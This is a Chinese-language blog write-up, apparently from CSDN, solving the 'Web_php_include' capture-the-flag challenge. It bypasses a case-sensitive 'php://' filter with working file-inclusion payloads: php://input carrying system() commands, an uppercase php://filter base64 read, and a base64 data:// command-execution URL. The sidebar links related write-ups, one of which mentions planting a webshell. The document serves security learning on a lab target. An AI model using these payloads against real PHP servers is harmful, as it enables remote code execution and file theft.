攻防世界之Web_php_include

最新推荐文章于 2023-05-22 21:38:28 发布
最新推荐文章于 2023-05-22 21:38:28 发布
阅读量670 收藏 3
点赞数 1
分类专栏: CTFのWriteUp 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/122973068
版权

打开连接,是一段PHP代码,审计一下

strstr()函数就是用于检查字符串中是否包涵另一个字符串,区分大小写哦

PHP strstr() 函数 | 菜鸟教程 (runoob.com)

str_replace()函数就是用来替换字符串中指定字符串的,也区分大小写哦

PHP str_replace() 函数 | 菜鸟教程 (runoob.com)

代码的意思就是将变量page里头的php://删掉,但是不能将PHP://删掉,所以可以用大写法绕过strstr函数

法一 PHP流

根据代码构建?page=php://input

用post传 <?php system('ls'); ?> 

使用burpsuite进行操作

可以看见响应包里有三个文件php,其中一个含有flag

再传 <?php system('cat  fl4gisisish3r3.php'); ?>

 就发现flag啦

还可以通过PHP流filter来查看含有flag的文件

构造?page=Php://filter/convert.base64-encode/resource=fl4gisisish3r3.php

将得到的代码进行base64解码即可拿到flag

法二 date://伪协议执行命令

 构建?page=data://text/plain;base64,xxxx

xxx为想要执行的命令的base64编码,

比如想要执行 <?php system('ls'); ?>

则应该构建的伪协议为

?page=data://text/plain;base64,IDw/cGhwIHN5c3RlbSgnbHMnKTsgPz4=

接着跟法一的操作就OK了 

金 帛
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4210
ctf学习记录
攻防世界-web-Web_php_include(文件包含与伪协议)
2301_77300311的博客
05-04 554
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
【CTF | 网络安全攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
最新发布
等风来
05-22 8887
该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5656
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 438
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
网络web安全攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界Web_php_include
2202_75317918的博客
04-13 826
攻防世界Web_php_include
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4461
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 419
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3325
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 web php include,攻防世界-Web_php_include (四种解法)
weixin_36035466的博客
03-09 292
攻防世界-Web_php_include (考察的是文件包含)打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空str_replace()以其他字符替换字符串中的一些字符(区分大小写)strstr() 查找字符串首次出现的位置。返回字符串剩余部分}include($page);?>分析代码可知程序过滤掉了page=参数传入php://第一种方法(大小写绕过)大小...
php一些函数
m0_54015794的博客
01-15 231
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界-web-Web_php_include
wuh2333的博客
05-18 174
攻防世界php_web_include
攻防世界web_php_include
qq_60905276的博客
11-12 252
看到题目分析一波什么意思,首先前面Get hello这个参数没用。 要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。 有两种方法。 第一:大写绕过 因为我查到strstr()这个函数是区分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。 page=PHP://input 这个命令可以再url上直接输入,也可以在抓包后输入。 先查看文件目录 <php? system("ls");?> 发现文件,再显示文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值